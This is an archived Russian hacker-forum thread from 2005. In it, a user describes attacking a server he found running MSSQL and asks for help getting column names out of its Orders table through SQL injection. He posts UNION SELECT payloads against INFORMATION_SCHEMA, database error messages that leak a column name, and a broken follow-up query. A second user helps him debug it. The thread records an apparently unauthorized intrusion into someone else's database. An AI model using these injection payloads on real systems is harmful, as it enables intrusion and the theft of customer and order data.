Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

Вопросы по SQL Injection

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [В Сети] >> Вопросы по SQL Injection
Имя
Сообщение << Старые топики   Новые топики >>
Вопросы по SQL Injection - 2005-08-11 22:20:14   
Кruger

Сообщений: 4
Оценки: 0
Присоединился: 2005-08-11 21:30:23
 Нашел сервак на котором стоит MSSQL, и с помощью скул иъекции узнал что там есть таблица Orders.
Теперь вопрос: как можно узнать ВСЕ названия столбцов. Первое название столбца с помощью такого
запроса
UNION SELECT COLUMN_NAME,null FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=''OrderItems'' выдает:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ''Account'' to a column of data type int.

Т.е перовый столбец ''Account''. Здесь читал __http://injection.rulezz.ru/MSSQL-ASP-Injection.html что остальные названия можно узнать с помощью запроса
UNION SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=''Orders'' WHERE COLUMN_NAME NOT IN (''Account'')
но на ето он жалуется
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword ''where''.
Вот собственно вопрос: как зделать чтоб етого не было?
Post #: 1
Вопросы по SQL Injection - 2005-08-12 15:39:46   
Great

Сообщений: 1046
Оценки: 0
Присоединился: 2005-08-11 19:41:36
 [p]
quote:

—————-<BR>Цитата: Дата:11.08.2005 22:20:14, Автор: Кruger ::
Нашел сервак на котором стоит MSSQL, и с помощью скул иъекции узнал что там есть таблица Orders.<BR>Теперь вопрос: как можно узнать ВСЕ названия столбцов. Первое название столбца с помощью такого <BR>запроса<BR>UNION SELECT COLUMN_NAME,null FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='OrderItems' выдает: <BR>[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Account' to a column of data type int.<BR><BR>Т.е перовый столбец 'Account'. Здесь читал __http://injection.rulezz.ru/MSSQL-ASP-Injection.html что остальные названия можно узнать с помощью запроса<BR>UNION SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='Orders' WHERE COLUMN_NAME NOT IN ('Account')<BR>но на ето он жалуется<BR>[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'where'.<BR>Вот собственно вопрос: как зделать чтоб етого не было? <BR>
—————-



Около конкретно какого WHERE ошибка?
Post #: 2
Вопросы по SQL Injection - 2005-08-12 21:27:30   
Кruger

Сообщений: 4
Оценки: 0
Присоединился: 2005-08-11 21:30:23
 По ходу, в втором. Т.к перед ним стоит кавычка
Post #: 3
Страниц:  [1]
Все форумы >> [В Сети] >> Вопросы по SQL Injection







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.